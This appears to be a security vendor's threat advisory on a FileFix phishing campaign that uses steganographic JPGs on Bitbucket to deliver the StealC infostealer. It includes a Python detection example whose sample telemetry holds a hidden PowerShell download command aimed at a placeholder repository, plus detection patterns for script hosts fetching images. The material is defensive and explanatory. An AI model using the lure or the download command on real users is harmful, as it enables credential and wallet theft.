FileFix Campaign Uses Steganography to Deliver StealC Infostealer
September 18th, 2025
High
Our Cyber Threat Intelligence Unit has identified an active FileFix social-engineering campaign distributing the StealC information stealer. The attack uses multilingual phishing pages posing as Meta/Facebook support that apply the “FileFix” technique: victims are tricked into pasting a malicious command into the Windows File Explorer address bar. This initiates a multi-stage payload chain that uses steganography to conceal secondary scripts within harmless-looking JPG files hosted on Bitbucket repositories. The final stage launches a Go-based loader that activates StealC, a stealer capable of harvesting browser credentials, crypto wallets, messaging apps, and cloud service credentials.
Technical Details
Attack Type: Social engineering (FileFix) with steganographic multi-stage payloads.
Severity: High.
Delivery Method: Victims visit phishing sites (e.g., fake Facebook support). The sites copy a crafted PowerShell command into the clipboard, tricking victims into pasting it into the File Explorer address bar.
Targeted Platforms: Windows endpoints with user interaction via browser and File Explorer.
Execution Chain:
PowerShell one-liner launches → downloads JPGs from Bitbucket raw URLs.
JPGs embed second-stage PowerShell and encrypted executables via steganography.
In-memory decoding → execution of a Go-based loader.
Loader unpacks shellcode, evades sandboxes, and executes StealC.

Impact
Credential Theft: StealC harvests browser cookies, saved credentials, messaging apps, and cloud (AWS, Azure) profiles.
Crypto Assets: Desktop/mobile wallets are targeted, and clipboard theft “clippers” may appear in variants.
Persistence / Expansion: Loader supports execution of additional payloads, expanding post-infection risk.
Detection Evasion: Steganography, obfuscation, and domain lookalikes reduce visibility to static detection and URL/attachment filtering.
Detection Method
Monitor for clipboard write events followed by Explorer.exe execution with non-file path arguments.
Create alerts for long, obfuscated PowerShell one-liners that retrieve JPGs/PNGs from developer hosting platforms like Bitbucket and GitHub.
Flag image downloads followed by PowerShell or Go loader execution.
Analyze suspicious images for embedded data (LSB anomalies, appended payloads).
Watch for process chains: browser/Explorer → PowerShell/MSHTA → Go loader → access to browser profiles, wallet DBs, or cloud CLI configs.
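The detection ideas above, as an added example that is not from the advisory: a Python check for the Explorer → PowerShell/MSHTA → image-fetch process chain over constructed sample events, and a JPEG segment walk that counts bytes appended after the End-Of-Image marker (the "appended payloads" case). The developer-hosting domain list, the sample command lines, the placeholder repository path and the minimal JPEG are constructed assumptions, not observed indicators.

```python
import re
from pathlib import PureWindowsPath

# Script hosts in the advisory's process chain, and image URLs on developer hosting platforms (assumed list).
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "mshta.exe"}
IMAGE_ON_DEV_HOSTING = re.compile(
    r"https?://(?:www\.)?(?:bitbucket\.org|github\.com|raw\.githubusercontent\.com)/\S+\.(?:jpe?g|png)\b", re.I)

def flag_event(parent: str, image: str, cmdline: str) -> list[str]:
    """Reasons a process-creation event matches Explorer -> script host -> image fetch ([] = clean)."""
    if PureWindowsPath(image).name.lower() not in SCRIPT_HOSTS:
        return []
    reasons = []
    if PureWindowsPath(parent).name.lower() == "explorer.exe":
        reasons.append("script host spawned by explorer.exe (address-bar execution)")
    if IMAGE_ON_DEV_HOSTING.search(cmdline):
        reasons.append("script host fetching a JPG/PNG from developer hosting")
    return reasons

def jpeg_trailing_bytes(data: bytes) -> int:
    """Count bytes after the JPEG End-Of-Image marker; anything > 0 was appended to the image."""
    if data[:2] != b"\xff\xd8":
        raise ValueError("not a JPEG")
    i = 2
    while i + 2 <= len(data):
        if data[i] != 0xFF:
            raise ValueError(f"corrupt segment structure at offset {i}")
        marker = data[i + 1]
        if marker == 0xD9:                                   # EOI: the image ends here
            return len(data) - (i + 2)
        i += 2 + int.from_bytes(data[i + 2:i + 4], "big")    # skip segment (EXIF thumbnails included)
        if marker == 0xDA:                                   # SOS: skip entropy-coded data to next marker;
            while i + 1 < len(data) and not (data[i] == 0xFF and data[i + 1] != 0x00
                                             and not 0xD0 <= data[i + 1] <= 0xD7):  # FF00 / RSTn stay inside
                i += 1
    return 0                                                 # no EOI: truncated file, nothing appended

# Constructed sample telemetry (not real events); "example-account/example-repo" is a placeholder.
SAMPLE_EVENTS = [
    (r"C:\Windows\explorer.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     r'powershell -w hidden -c "iwr https://bitbucket.org/example-account/example-repo/raw/main/photo.jpg -OutFile $env:TEMP\p.jpg"'),
    (r"C:\Windows\explorer.exe", r"C:\Program Files\Notepad++\notepad++.exe", "notepad++.exe notes.txt"),
]
# Constructed minimal JPEG (SOI, APP0, SOS, stuffed scan bytes, EOI) plus a placeholder blob to append.
CLEAN_JPEG = (b"\xff\xd8" + b"\xff\xe0\x00\x10JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
              + b"\xff\xda\x00\x08\x01\x01\x00\x00\x3f\x00" + b"\x12\x34\xff\x00\x56" + b"\xff\xd9")
APPENDED = b"APPENDED-STAGE2-PLACEHOLDER"
```

Run `flag_event(*ev)` over each sample event and `jpeg_trailing_bytes(CLEAN_JPEG + APPENDED)` to see the first event flagged twice, the notepad++ event left clean, and 27 foreign bytes reported after the image.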
Indicators of Compromise

Recommendations
User Awareness: Educate users on FileFix/ClickFix lures — never paste clipboard contents into Explorer or system dialogs.
Script Control: Enforce Constrained Language Mode, enable AMSI/ScriptBlock logging, and flag obfuscated PowerShell fetching images.
Content Filtering: Block/monitor unexpected downloads from developer platforms (Bitbucket, GitHub) and flag anomalous image downloads.
EDR/Behavioral Rules: Detect in-memory decryption, Explorer→PowerShell chains, and unauthorized access to browser/wallet/cloud directories.
Threat Intel Feeds: Continuously ingest vendor feeds (Acronis, BleepingComputer, THN, Infosecurity) for updated IOCs and TTPs.
Conclusion
FileFix has rapidly evolved from a proof-of-concept to an active campaign. By combining clipboard-based social engineering with steganography and a modular loader, attackers can stealthily deliver StealC. Since StealC targets high-value assets like credentials, sessions, wallets, and cloud keys, we urge organizations to prioritize behavioral detection over static rules and to immediately rotate credentials if compromise is suspected.